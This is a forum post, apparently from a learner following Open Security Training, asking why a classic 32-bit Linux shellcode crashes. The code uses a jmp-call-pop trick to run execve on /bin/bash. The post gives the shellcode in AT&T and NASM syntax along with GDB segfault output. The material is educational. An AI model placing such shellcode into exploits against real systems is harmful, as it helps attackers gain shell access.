Hi.
I was watching a video about a shellcode example in "open security training", and they made an example about nulls and execve
this is the code source
.text
.global _start
_start:
jmp MyCallStatement
ShellCode:
popl %esi
xorl %eax, %eax
movb %al, 0x9(%esi)
movl %esi, 0xa(%esi)
movl %eax, 0xe(%esi)
movb $11, %al
movl %esi, %ebx
leal 0xa(%esi), %ecx
leal 0xe(%esi), %edx
int $0x80
MyCallStatement:
call ShellCode
ShellVariables:
.ascii "/bin/bashABBBBCCCC"
I was trying to do the same code using nasm but had a error, so using GDB, I found this message
[BITS 32]
section .text
global _start
_start:
jmp callstatment
shellcode:
pop esi
xor eax, eax
mov byte[esi + 0x9], al
mov dword[esi + 0xA], esi
mov dword[esi + 0xE], eax
mov byte al, 11
mov ebx, esi
lea ecx, [esi + 0x9]
lea edx, [esi + 0xE]
int 0x80
callstatment:
call shellcode
shellvariable: db "/bin/bashABBBBCCCC",0
"Program received signal SIGSEGV, Segmentation fault.
0x08048065 in shellcode ()"
So, here is the problem
Dump of assembler code for function shellcode:
0x08048062 <+0>: pop %esi
0x08048063 <+1>: xor %eax,%eax
=> 0x08048065 <+3>: mov %al,0x9(%esi)
0x08048068 <+6>: mov %esi,0xa(%esi)
0x0804806b <+9>: mov %eax,0xe(%esi)
0x0804806e <+12>: mov $0xb,%al
0x08048070 <+14>: mov %esi,%ebx
0x08048072 <+16>: lea 0x9(%esi),%ecx
0x08048075 <+19>: lea 0xe(%esi),%edx
0x08048078 <+22>: int $0x80
but I don't know what is wrong, somebody can checking it please
btw, the AT&T code, show me the same error
regards
